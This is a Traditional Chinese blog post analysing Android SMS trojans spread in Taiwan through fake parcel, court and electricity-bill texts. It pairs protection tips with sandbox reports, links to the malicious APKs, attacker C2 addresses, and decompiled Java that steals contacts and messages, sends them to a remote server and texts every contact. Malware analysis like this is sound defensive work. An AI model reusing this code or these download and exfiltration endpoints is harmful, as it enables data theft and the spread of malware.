android 簡訊病毒:

Step 1. 開啟「設定」，選擇「安全性」之後，再取消勾選「未知的來源」 (允許安裝非Market應用程式)，如下圖：

經過這樣的設定之後，我們就只能從Google Play上安裝APP，就算去點擊了簡訊的goo.gl超連結，而下載到宅急便的憑證.apk檔案，也再一次不小心又按到了下載後的apk檔案，並且再一次不小心再去點擊了「程式安裝器」，你的手機在安裝時，都會直接將安裝程式給擋下，出現「安裝遭封鎖」的訊息，如下圖：

因此，從另一個角度來看，如果你希望安裝下載來的apk檔案，就必需去勾選這個「未知的來源」，才有辦法安裝。

取消「小額付費」的服務

話說這個小額付費的服務，對於一般人來說，似乎是沒什麼作用…

所以請打各自電信公司的客服，去停了它吧！就算沒有中毒，你也應該去停掉它…

中華電信：手機直撥800，或0800080090客服專線
台灣大哥大：手機直撥 188免費或 02-66062999
遠傳電信：手機直撥888/123 市話撥449-5888/449-5123

android 簡訊病毒號碼: 0912104628
android 簡訊病毒網址: http://goo.gl/4zjSLG
android 簡訊病毒內容: 您的法院訴訟

android 簡訊病毒網址: https://www.dropbox.com/s/l0lqzrtzqh2d6qd/%E9%80%9A%E7%9F%A5%E5%96%AE.apk

android 簡訊病毒號碼: 0955164020

android 簡訊病毒內容: 您的民事賠償

android 簡訊病毒網址: http://goo.gl/9Ofdu2

android 簡訊病毒網址: https://www.dropbox.com/s/09g745brshb6m73/%E9%80%9A%E7%9F%A5%E5%96%AE.apk

通知單.apk

流量分析: http://goo.gl/#analytics/goo.gl/9Ofdu2/all_time

- Broadcast Receivers

com.example.google.service.MyDeviceAdminReceiver

intent-filter action:

android.app.action.DEVICE_ADMIN_ENABLED

com.example.google.service.SMSServiceBootReceiver

intent-filter action:

android.intent.action.BOOT_COMPLETED

com.example.google.service.SMSReceiver

intent-filter action:

android.provider.Telephony.SMS_RECEIVED

TaskRequest

	- Required Permissions

android.permission.READ_PHONE_STATE

android.permission.SEND_SMS

android.permission.READ_SMS

android.permission.WRITE_SMS

android.permission.RECEIVE_SMS

android.permission.INTERNET

android.permission.READ_CONTACTS

android.permission.RECEIVE_BOOT_COMPLETED

- Used Permissions

android.permission.SEND_SMS

method call:	"Lcom/example/google/service/SMSSender/SendToContacts(Landroid/os/Message;)V" calls"Landroid/telephony/SmsManager/getDefault()Landroid/telephony/SmsManager;"
method call:	"Lcom/example/google/service/SMSSender/SendToContacts(Landroid/os/Message;)V" calls"Landroid/telephony/SmsManager/sendTextMessage(Ljava/lang/String; Ljava/lang/String; Ljava/lang/String; Landroid/app/PendingIntent; Landroid/app/PendingIntent;)V"
method call:	"Lcom/example/google/service/SMSSender/SendSMS(Landroid/os/Message;)V" calls"Landroid/telephony/SmsManager/getDefault()Landroid/telephony/SmsManager;"
method call:	"Lcom/example/google/service/SMSSender/SendSMS(Landroid/os/Message;)V" calls "Landroid/telephony/SmsManager/sendTextMessage(Ljava/lang/String; Ljava/lang/String; Ljava/lang/String; Landroid/app/PendingIntent; Landroid/app/PendingIntent;)V"

android.permission.READ_PHONE_STATE

method call:	"Lcom/example/google/service/Tools/getPhoneNumber(Landroid/content/Context;)Ljava/lang/String;" calls"Landroid/telephony/TelephonyManager/getLine1Number()Ljava/lang/String;"
method call:	"Lcom/example/google/service/Tools/getPhoneNumber(Landroid/content/Context;)Ljava/lang/String;" calls"Landroid/telephony/TelephonyManager/getDeviceId()Ljava/lang/String;"
method call:	"Lcom/example/google/service/Tools/getPhoneNumber(Landroid/content/Context;)Ljava/lang/String;" calls"Landroid/telephony/TelephonyManager/getSimSerialNumber()Ljava/lang/String;"
method call:	"Lcom/example/google/service/Tools/getPhoneNumber(Landroid/content/Context;)Ljava/lang/String;" calls"Landroid/telephony/TelephonyManager/getSubscriberId()Ljava/lang/String;"

android.permission.VIBRATE

method call:	"Landroid/support/v4/app/NotificationCompat$Builder/setDefaults(I)Landroid/support/v4/app/NotificationCompat$Builder;" calls"Landroid/app/Notification/Idefaults"
method call:	"Landroid/support/v4/app/NotificationCompatHoneycomb/add(Landroid/content/Context; Landroid/app/Notification; Ljava/lang/CharSequence; Ljava/lang/CharSequence; Ljava/lang/CharSequence; Landroid/widget/RemoteViews; I Landroid/app/PendingIntent; Landroid/app/PendingIntent; Landroid/graphics/Bitmap;)Landroid/app/Notification;" calls "Landroid/app/Notification/Idefaults"
method call:	"Landroid/support/v4/app/NotificationCompatIceCreamSandwich/add(Landroid/content/Context; Landroid/app/Notification; Ljava/lang/CharSequence; Ljava/lang/CharSequence; Ljava/lang/CharSequence; Landroid/widget/RemoteViews; I Landroid/app/PendingIntent; Landroid/app/PendingIntent; Landroid/graphics/Bitmap; I I Z)Landroid/app/Notification;" calls "Landroid/app/Notification/Idefaults"
method call:	"Landroid/support/v4/app/NotificationCompatJellybean/(Landroid/content/Context; Landroid/app/Notification; Ljava/lang/CharSequence; Ljava/lang/CharSequence; Ljava/lang/CharSequence; Landroid/widget/RemoteViews; I Landroid/app/PendingIntent; Landroid/app/PendingIntent; Landroid/graphics/Bitmap; I I Z Z I Ljava/lang/CharSequence;)V" calls "Landroid/app/Notification/Idefaults"

android.permission.ACCESS_NETWORK_STATE

method call:	"Landroid/support/v4/net/ConnectivityManagerCompat/getNetworkInfoFromBroadcast(Landroid/net/ConnectivityManager; Landroid/content/Intent;)Landroid/net/NetworkInfo;" calls "Landroid/net/ConnectivityManager/getNetworkInfo(I)Landroid/net/NetworkInfo;"
method call:	"Landroid/support/v4/net/ConnectivityManagerCompatGingerbread/isActiveNetworkMetered(Landroid/net/ConnectivityManager;)Z" calls"Landroid/net/ConnectivityManager/getActiveNetworkInfo()Landroid/net/NetworkInfo;"
method call:	"Landroid/support/v4/net/ConnectivityManagerCompatHoneycombMR2/isActiveNetworkMetered(Landroid/net/ConnectivityManager;)Z" calls"Landroid/net/ConnectivityManager/getActiveNetworkInfo()Landroid/net/NetworkInfo;"
method call:	"Landroid/support/v4/net/ConnectivityManagerCompat$BaseConnectivityManagerCompatImpl/isActiveNetworkMetered(Landroid/net/ConnectivityManager;)Z" calls"Landroid/net/ConnectivityManager/getActiveNetworkInfo()Landroid/net/NetworkInfo;"

android.permission.CHANGE_COMPONENT_ENABLED_STATE

method call:

"Lcom/example/google/service/MainActivity/HideIcon()V" calls"Landroid/content/pm/PackageManager/setComponentEnabledSetting(Landroid/content/ComponentName; I I)V"

android.permission.WAKE_LOCK

method call:	"Landroid/support/v4/content/WakefulBroadcastReceiver/startWakefulService(Landroid/content/Context; Landroid/content/Intent;)Landroid/content/ComponentName;" calls "Landroid/os/PowerManager/newWakeLock(I Ljava/lang/String;)Landroid/os/PowerManager$WakeLock;"
method call:	"Landroid/support/v4/content/WakefulBroadcastReceiver/completeWakefulIntent(Landroid/content/Intent;)Z" calls"Landroid/os/PowerManager$WakeLock/release()V"
method call:	"Landroid/support/v4/content/WakefulBroadcastReceiver/startWakefulService(Landroid/content/Context; Landroid/content/Intent;)Landroid/content/ComponentName;" calls "Landroid/os/PowerManager$WakeLock/acquire(J)V"

android.permission.READ_CONTACTS

method call:	"Lcom/example/google/service/ContactsHelper/getPhoneContactNumbers()V" calls"Landroid/provider/ContactsContract$CommonDataKinds$Phone/Landroid/net/Uri;CONTENT_URI"
method call:	"Lcom/example/google/service/ContactsHelper/getPhoneContacts()V" calls"Landroid/provider/ContactsContract$CommonDataKinds$Phone/Landroid/net/Uri;CONTENT_URI"

android.permission.INTERNET

method call:

"Lcom/example/google/service/HttpHelper/callWS(Ljava/lang/String;)Ljava/lang/String;" calls "Lorg/apache/http/impl/client/DefaultHttpClient/()V"

	- Used Features

android.hardware.telephony

android.hardware.touchscreen

net:
GET /sms/SMSHandler1.ashx?t=new HTTP/1.1 Host: 141.105.65.113 Connection: Keep-Alive User-Agent: Apache-HttpClient/UNAVAILABLE (java 1.4)
HTTP/1.1 200 OK Cache-Control: private Content-Length: 0 Server: Microsoft-IIS/7.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Date: Fri, 06 Jun 2014 15:38:16 GMT
GET /sms/SMSHandler1.ashx?t=new HTTP/1.1 Host: 141.105.65.113 Connection: Keep-Alive User-Agent: Apache-HttpClient/UNAVAILABLE (java 1.4)
HTTP/1.1 200 OK Cache-Control: private Content-Length: 0 Server: Microsoft-IIS/7.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Date: Fri, 06 Jun 2014 15:38:16 GMT
GET /sms/SMSHandler1.ashx?t=new HTTP/1.1 Host: 141.105.65.113 Connection: Keep-Alive User-Agent: Apache-HttpClient/UNAVAILABLE (java 1.4)
GET /sms/SMSHandler1.ashx?t=new HTTP/1.1 Host: 141.105.65.113 Connection: Keep-Alive User-Agent: Apache-HttpClient/UNAVAILABLE (java 1.4)

leak:
GET /sms/SMSHandler1.ashx?t=request&p=15555215554&m=generic%3B10 HTTP/1.1 Host: 141.105.65.113 Connection: Keep-Alive User-Agent: Apache-HttpClient/UNAVAILABLE (java 1.4)
GET /sms/SMSHandler1.ashx?t=r&p=15555215554&a=0815123456789&m=Hello%20World!&d=1402069070000 HTTP/1.1 Host: 141.105.65.113 Connection: Keep-Alive User-Agent: Apache-HttpClient/UNAVAILABLE (java 1.4)
GET /sms/SMSHandler1.ashx?t=request&p=15555215554&m=generic%3B10 HTTP/1.1 Host: 141.105.65.113 Connection: Keep-Alive User-Agent: Apache-HttpClient/UNAVAILABLE (java 1.4)
GET /sms/SMSHandler1.ashx?t=r&p=15555215554&a=0815123456789&m=Hello%20World!&d=1402069108000 HTTP/1.1 Host: 141.105.65.113 Connection: Keep-Alive User-Agent: Apache-HttpClient/UNAVAILABLE (java 1.4)

dns:
muc03s07-in-f14.1e100.net

http:

Request: GET /sms/SMSHandler1.ashx?t=request&p=15555215554&m=generic;10

Response: 200 "OK"

Request: GET /sms/SMSHandler1.ashx?t=new

Response: 200 "OK"
Request: GET /sms/SMSHandler1.ashx?t=new

tcp:
173.194.44.14:443

android 簡訊病毒號碼: 0926566920
android 簡訊病毒內容: 宅急便快遞
android 簡訊病毒網址: http://goo.gl/6yOcoV (無法下載)
android 簡訊病毒網址: https://www.dropbox.com/s/9llco6cqo0rxyup/%E6%86%91%E8%AD%89.apk?m=
2014-06-02 19:07:04 ERROR 509: Bandwidth Error.
流量分析: http://goo.gl/#analytics/goo.gl/6yOcoV/all_time

android 簡訊病毒號碼: 0933398720
android 簡訊病毒內容: 宅急便快遞
android 簡訊病毒網址: http://goo.gl/6fs5jx (已分析)
android 簡訊病毒網址: https://www.dropbox.com/s/rr5xv3qsn7815u0/%E9%9B%BB%E5%AD%90%E8%A1%A8%E5%96%AE.apk?m=
電子表單.apk
流量分析: http://goo.gl/#analytics/goo.gl/6fs5jx/all_time

- Native Libraries Loaded

Native Library Name

Trying to load lib /data/data/google.service/lib/libAPKProtect.so 0x40516838

Trying to load lib /data/data/google.service/lib/libSafeCore.so 0x40516838

dns:

Name	Query Type	Query Result	Successful	Protocol
ybbcel888.vicp.cc	DNS_TYPE_A	220.136.223.64	1	udp
ybbcel999.eicp.net	DNS_TYPE_A	220.136.213.43	1	udp

tcp:220.136.223.64:9090

Ad-Aware Android.Trojan.SMSSend.ND 20140602
AegisLab SUSPICIOUS 20140602
AhnLab-V3 Android-Malicious/Litch 20140602
AntiVir Android/SmsAgent.EB.Gen 20140602
Avast Android:RuSMS-AH [Trj] 20140602
BitDefender Android.Trojan.SMSSend.ND 20140602
DrWeb Android.SmsBot.72.origin 20140602
ESET-NOD32 a variant of Android/TrojanSMS.Agent.ADD 20140602
Emsisoft Android.Trojan.SMSSend.ND (B) 20140602
F-Secure Trojan:Android/SmsSend.IE 20140601
GData Android.Trojan.SMSSend.ND 20140602
Kaspersky HEUR:Trojan-Spy.AndroidOS.SmForw.al 20140602
MicroWorld-eScan Android.Trojan.SMSSend.ND 20140602
Sophos Andr/SMSSend-EC

android 簡訊病毒號碼: 0961267359
android 簡訊病毒內容: 宅急便快遞
android 簡訊病毒網址: http://goo.gl/58ooGF (無法下載)
android 簡訊病毒網址: https://www.dropbox.com/s/iweqcsh4vp9g5f3/%E6%86%91%E8%AD%89.apk?m=
憑證.apk
http://goo.gl/#analytics/goo.gl/58ooGF/all_time

Error (509)

This account's public links are generating too much traffic and have been temporarily disabled!

android 簡訊病毒內容: 黑貓宅急便
android 簡訊病毒網址: http://goo.gl/em7bab (已分析)
[application/vnd.android.package-archive]
android 簡訊病毒網址: https://www.dropbox.com/s/plym2gpyohf9n7a/%E6%86%91%E8%AD%89.apk?m=
http://goo.gl/#analytics/goo.gl/em7bab/all_time

	- Native Libraries Loaded

Native Library Name

Trying to load lib /data/data/google.service/lib/libAPKProtect.so 0x40516838

Trying to load lib /data/data/google.service/lib/libSafeCore.so 0x40516838

dns:

Name	Query Type	Query Result	Successful	Protocol
ybbcel999.eicp.net	DNS_TYPE_A	61.228.130.24	1	udp
ybbcel888.vicp.cc	DNS_TYPE_A	220.136.213.160	1	udp

android 簡訊病毒內容: 黑貓宅急便(2)
android 簡訊病毒網址: http://goo.gl/SOkMHW (已分析)
android 簡訊病毒網址: https://www.dropbox.com/s/zv1f6h6rezcuttt/%E6%86%91%E8%AD%89.apk
http://goo.gl/#analytics/goo.gl/SOkMHW/all_time

- Native Libraries Loaded

Native Library Name

Trying to load lib /data/data/google.service/lib/libAPKProtect.so 0x40516838

Trying to load lib /data/data/google.service/lib/libSafeCore.so 0x40516838

dns:

Name	Query Type	Query Result	Successful	Protocol
buyaoa1.vicp.co	DNS_TYPE_A	111.249.169.13	1	udp
yemian3.vicp.co	DNS_TYPE_A	220.136.220.151	1	udp

tcp:111.249.169.13:9090

android 簡訊病毒內容: 張瑞芬您申請網上支付電費
android 簡訊病毒網址: http://goo.gl/k0jo8D (已分析)
[application/vnd.android.package-archive]
http://goo.gl/#analytics/goo.gl/k0jo8D/all_time

	- Native Libraries Loaded

Native Library Name

Trying to load lib /data/data/google.service/lib/libAPKProtect.so 0x40516838

Trying to load lib /data/data/google.service/lib/libSafeCore.so 0x40516838

dns:

Name	Query Type	Query Result	Successful	Protocol
ybbcel999.eicp.net	DNS_TYPE_A	61.228.130.220	1	udp
ybbcel888.vicp.cc	DNS_TYPE_A	61.228.131.215	1	udp

android 簡訊病毒內容: 您的快遞簽收通知單
android 簡訊病毒網址: http://goo.gl/1MN94O (已分析)
android 簡訊病毒網址: https://www.dropbox.com/s/62556lg017ht0du/%E9%80%9A%E7%9F%A5%E5%96%AE.apk
http://goo.gl/#analytics/goo.gl/1MN94O/all_time

- Native Libraries Loaded

Native Library Name

Trying to load lib /data/data/msc.switchlib.act/lib/libbsvsv.so 0x40516898

Trying to load lib /data/data/msc.switchlib.act/lib/libbsomd.so 0x40516898

dns:

Name	Query Type	Query Result	Successful	Protocol
xdynfa.vicp.co	DNS_TYPE_A	211.20.68.250	1	0
boyiis.iego.cn	DNS_TYPE_A	114.25.31.243	1	0
android.clients.google.com	DNS_TYPE_A	173.194.116.162 173.194.116.163 173.194.116.164 173.194.116.165 173.194.116.166 173.194.116.167 173.194.116.168 173.194.116.169 173.194.116.174 173.194.116.160 173.194.116.161	1	0
162.116.194.173.in-addr.arpa	DNS_TYPE_PTR

service:

Timestamp	Service Name
3.232	com.android.vending.util.WorkService
3.232	com.android.vending.util.WorkService
11.234	msc.switchlib.act.BaseService
22.241	com.android.music.MediaPlaybackService
23.236	com.android.music.MediaPlaybackService
23.237	com.android.music.MediaPlaybackService
24.241	com.android.music.MediaPlaybackService
24.242	com.android.music.MediaPlaybackService
25.237	com.android.music.MediaPlaybackService
30.232	com.android.music.MediaPlaybackService
31.237	com.android.music.MediaPlaybackService
60.249	com.android.music.MediaPlaybackService
60.249	com.android.music.MediaPlaybackService
72.252	msc.switchlib.act.BaseService
78.253	msc.switchlib.act.BaseService
162.486	com.android.mms.transaction.SmsReceiverService
162.487	com.android.mms.transaction.SmsReceiverService
167.490	msc.switchlib.act.BaseService
179.985	msc.switchlib.act.BaseService
179.986	msc.switchlib.act.BaseService
179.986	com.android.email.service.EmailBroadcastProcessorService
179.986	com.android.email.service.EmailBroadcastProcessorService
179.986	com.google.android.gsf.checkin.CheckinService
179.986	com.google.android.gsf.checkin.CheckinService
179.986	com.android.exchange.SyncManager
180.991	com.google.android.gsf.update.SystemUpdateService
180.991	com.google.android.gsf.update.SystemUpdateService
180.991	com.google.android.partnersetup.AppHiderService
180.992	com.google.android.partnersetup.AppHiderService
180.992	com.android.providers.downloads.DownloadService
180.992	com.android.providers.downloads.DownloadService
181.986	com.android.mms.transaction.SmsReceiverService
181.986	com.android.mms.transaction.SmsReceiverService
181.986	com.android.providers.media.MediaScannerService
181.986	com.android.providers.media.MediaScannerService
181.986	com.android.vending.util.AlarmService
181.986	com.android.vending.util.AlarmService
182.991	com.android.providers.calendar.EmptyService
182.991	com.android.bluetooth.opp.BluetoothOppService
182.991	com.android.bluetooth.opp.BluetoothOppService
182.991	com.google.android.gm.MailIntentService
182.992	com.google.android.gm.MailIntentService
182.992	com.google.android.gm.downloadprovider.DownloadService
182.992	com.google.android.gm.downloadprovider.DownloadService
187.998	com.google.android.gsf.checkin.CheckinService
187.998	com.google.android.gsf.checkin.CheckinService
187.998	com.google.android.gsf.update.SystemUpdateService
187.998	com.google.android.gsf.update.SystemUpdateService
189.998	com.google.android.partnersetup.AppHiderService
189.999	com.google.android.partnersetup.AppHiderService
197.993	com.google.android.gsf.checkin.CheckinService
197.993	com.google.android.gsf.checkin.CheckinService
197.993	com.google.android.gsf.checkin.EventLogService
197.993	com.google.android.gsf.checkin.EventLogService
197.993	com.android.providers.calendar.EmptyService
197.993	com.google.android.gsf.checkin.EventLogService
197.994	com.google.android.gsf.checkin.EventLogService
207.413	com.google.android.gsf.checkin.CheckinService
207.413	com.google.android.gsf.checkin.CheckinService
207.413	com.google.android.gsf.update.SystemUpdateService
207.413	com.google.android.gsf.update.SystemUpdateService
209.412	com.google.android.partnersetup.AppHiderService
209.412	com.google.android.partnersetup.AppHiderService

android 簡訊病毒內容: 宅急便快遞通知
android 簡訊病毒網址: wget http://goo.gl/6U6J3B (無法下載)
android 簡訊病毒網址: https://www.dropbox.com/s/g4c8e9zp8dqqhk5/%E6%86%91%E8%AD%89.apk?m=
ERROR 509: Bandwidth Error.
http://goo.gl/#analytics/goo.gl/6U6J3B/all_time

android 簡訊病毒內容: 瑞芬找到你了
android 簡訊病毒網址: wget http://goo.gl/976Zaj (無法下載)
android 簡訊病毒網址: http://211.44.3.186/11/index.php
http://goo.gl/#analytics/goo.gl/976Zaj/all_time

用電腦開時，他會去判斷這是電腦，所以就導到新聞網頁去

但如果用手機開啟，就會讓你下載apk檔

再來分析一下註冊的IP

211.44.3.186

經過whois的查詢

是註冊在 Korea Network infomation Center(韓國網路資訊中心)

想也知道宅配公司怎麼可能會用韓國的IP

android 簡訊病毒內容: 您正在申請網上支付電費
android 簡訊病毒網址: wget http://goo.gl/UB9zBa (無法下載)
android 簡訊病毒網址: http://203.69.59.153/dong/%E9%80%9A%E7%9F%A5%E5%96%AE.apk
通知單.apk
http://goo.gl/#analytics/goo.gl/UB9zBa/all_time

詐騙簡訊內容：您正在申請網上支付103年2月電費共計367元, 若非本人操作, 請查看電子憑證進行取消 http://goo.gl/UB9zBa

點選會到http://203.69.59.153/dong/%E9%80%9A%E7%9F%A5%E5%96%AE.apk下載apk，若開啟安裝，則出現：

資安分析：

1. 這隻惡意apk可以讀取手機：通訊錄朋友的姓名電話、簡訊SMS訊息，會把使用者的手機號碼上傳至203.69.59.153 這一個IP：

[GET] http://203.69.59.153/dong/SMSHandler.ashx?t=s&p=[TelNum]

2. IP使用whois系統查詢 http://www.whois365.com/tw/ip/203.69.59.153

顯示為中華電信所管轄的IP，可能是客戶租用的IP主機被駭？

3. 駭客持續的攻擊分佈集中在下述日期：3/26：1706次、3/31：2946次、4/3：3873次、4/7：4869次。目前總計超過31000次。（以上數字依照使用者點選短網址統計報表，但有警覺性的使用者，真實攻擊次數更多）直至本篇截稿前，該被駭IP的網路服務仍然存在。

最近非常夯的簡訊病毒，很多朋友都有收到這樣的簡訊，我的 Android 手機也收到好幾次，
不過，既然自己接觸 Android 也有不短的時間了，那就剛好發揮一下專業來看看這個病毒到底會做些什麼事情。
Android APK 程式包裝是著名的容易反組譯，幾年前也剛好有個很強的反組譯軟體dex2jar 出現，搭配 JD-GUI 還能很容易的看到反組譯出來的原始碼，大家有興趣也可以試試看。

如果想要知道怎麼反組譯，可以參考下面的步驟，

1. 安裝好 dex2jar 和 JD-GUI
2. 在 command line 執行
$> dex2jar.sh apkfile

這樣會在資料夾內產生一個名為 apkfile_dex2jar.jar 的檔案
3. 用 JD-GUI 打開該檔案就可以看到原始碼

-----
下面總結一下這個簡訊病毒的相關實作細節，

這個病毒會取得下面這些權限，

android.permission.READ_PHONE_STATE

android.permission.SEND_SMS

android.permission.READ_SMS

android.permission.WRITE_SMS

android.permission.RECEIVE_SMS

android.permission.INTERNET

android.permission.CALL_PHONE

android.permission.READ_CONTACTS

android.permission.WRITE_EXTERNAL_STORAGE

com.android.launcher.action.INSTALL_SHORTCUT

這些權限都是跟簡訊和聯絡人資料有關，跟我們所知道的病毒行為相符。

我們從 AndroidManifest.xml 可以看得出來它有三個關鍵組件，

".SMSServices">

"com.example.android.services.SMSServices" />

"SMSServiceBootReceiver">

"android.intent.action.BOOT_COMPLETED" />

android:name="SMSSender" />

每次手機開機，SMSServiceBootReceiver 都會收到 Broadcast，裡面的行為就是啟動 SMSService，所以手機重開機也無法停止病毒的行動。

public class SMSServiceBootReceiver extends BroadcastReceiver

{

public void onReceive(Context paramContext, Intent paramIntent)

{

Intent localIntent = new Intent();

localIntent.setAction("com.example.android.services.SMSServices");

paramContext.startService(localIntent);

}

這個病毒的預設起始元件是 MainActivity，剛啟動時會去檢查是不是用 Emulator 執行該 APK，看來是怕被 try 病毒行為，可能也跟他的 Server 有關係吧。

剛剛有提到手機開機就會去執行 SMSService，另外，一旦我們執行這個程式後，SMSService 也會被啟動，基本上就是要確保 SMSService 能夠被運行起來。

在 SMSService 裡面會啟動 SMSObserver 及 SMSSender，接下來我們再來看這幾個部分。

SMSObserver 的部分，他會去看你的簡訊收件匣裡面所有未讀的簡訊，並把你收到的簡訊內容截取出來，最後將這些簡訊的內容送出到遠端 Server，內容會包含下面幾個資訊，

· 你自己的手機號碼

· 來訊者的手機號碼

· 訊息內容

· 訊息傳送時間

傳送到遠端 Server 的方式，看起來是一台 Microsoft-IIS/7.0 Server，似乎是用 ASP.NET 寫的 WebService，下面是他傳送到 Server 的 format，使用 GET operation，基本上，後續的相關行為都會傳到該 Server，而且 Server 會回傳一些內容，作為 Client 的使用，但我嘗試用 Postman 送些 Request 過去，似乎沒有接到任何回傳，Server 可能有擋一些濫用 API 的行為，但也可能是我下的 Http Request 格式還是有問題吧。

http://101.55.13.43/sms/SMSHandler.ashx?t=r&p=你的手機號碼&a=朋友的手機號碼&m=訊息內容&d=傳送時間

這樣的 Request 出去實在很可怕，遠端 Server 應該會把這些資料都記起來，又可以再販賣個資，也可以作為日後發送簡訊的內容參考，甚至是增進社交工程的技術，現在透過網際網路，所有資訊的流通都很迅速，經由連網裝置，一旦有機可乘，就能很容易地竊取到私密資料，太可怕了。

SMSSender 的部分，它被啟動時，會去運行 Contact class 裡面的程式碼，

public void Send()

throws

UnsupportedEncodingException,
ParserConfigurationException, InterruptedException

{

  ArrayList localArrayList
= new

ContactsHelper(this._Context).GetAllContacts();

  WebServiceCalling
localWebServiceCalling = new

WebServiceCalling(this._Context);

  String str1 =
Tools.getPhoneNumber(this._Context);

  String str2 =
"";

  Iterator localIterator =
localArrayList.iterator();

while (true)

{

if (!localIterator.hasNext())

{

if (str2.length() > 0)

        localWebServiceCalling.SC(null,
str1, str2);

return;

}

    String str3 =
(String)localIterator.next();

    str2 = str2 +
","

+
str3;

if (str2.length() > 20)

{

      localWebServiceCalling.SC(null,
str1, str2);

      str2
= "";

}

這部分會去看你手機上的通訊錄，把通訊錄上所有聯絡人都擷取出來，然後傳送到遠端 Server，傳送內容會包含，

· 你自己的手機號碼

· 聯絡人名稱

· 聯絡人手機號碼

另外，它也會傳送簡訊給其他聯絡人，

localSmsManager.sendTextMessage(str8.trim(), null, str9, null, null);

localWebServiceCalling.log("SMS", "S", str1, str8 + "|" + str9);

每60秒它就會傳送你的聯絡人資料到遠端 Server 並傳送簡訊給其他聯絡人，

public static void sendUpdateBroadcastRepeat(Context paramContext)

{

PendingIntent localPendingIntent = PendingIntent.getBroadcast(paramContext, 0, new Intent(paramContext, SMSSender.class), 0);

long l = SystemClock.elapsedRealtime();

((AlarmManager)paramContext.getSystemService("alarm")).setRepeating(2, l, 60000L, localPendingIntent);

}

另外看到所有的 Http GET 操作，都會再把 Http Response 的內容透過 Message 丟給注入的 Handler 做其他處理。

new Thread(new Runnable()

{

public void run()

{

try

{

String str = WebServiceCalling.this.callWS(paramString);

if (paramHandler != null)

{

Message localMessage = new Message();

localMessage.what = paramInt;

localMessage.obj = str;

paramHandler.sendMessage(localMessage);

}

return;

}

catch (UnsupportedEncodingException localUnsupportedEncodingException)

{

localUnsupportedEncodingException.printStackTrace();

return;

}

catch (ParserConfigurationException localParserConfigurationException)

{

localParserConfigurationException.printStackTrace();

}

}).start();

簡訊內容的來源是遠端server，所以應該可以很快地改變訊息發送的內容，也可以依據狀況改變要發送的連結內容。

另外，他還會監控你的來電，當有手機來電時，會將電話轉到 #，這是我不太理解的部分，不清楚轉號碼到這個 # 號會變怎麼樣，是會接掛斷電話？還是跟 USSD 漏洞有關係？

-----
以上就是病毒程式碼大致的狀況，雖然這個病毒還需要安裝執行才會有作用，不過對於一般人來說，應該比較難警覺到 App 有詐。因為一旦被感染後，病毒就可以直接存取聯絡人資料，所以傳播速度真是非常快，這些病毒的猖獗真是可怕。

jauming

Sunday, May 18, 2014

android 簡訊病毒:

取消「小額付費」的服務

Error (509)

標籤(tags,Labels)

Blog Archive

About Me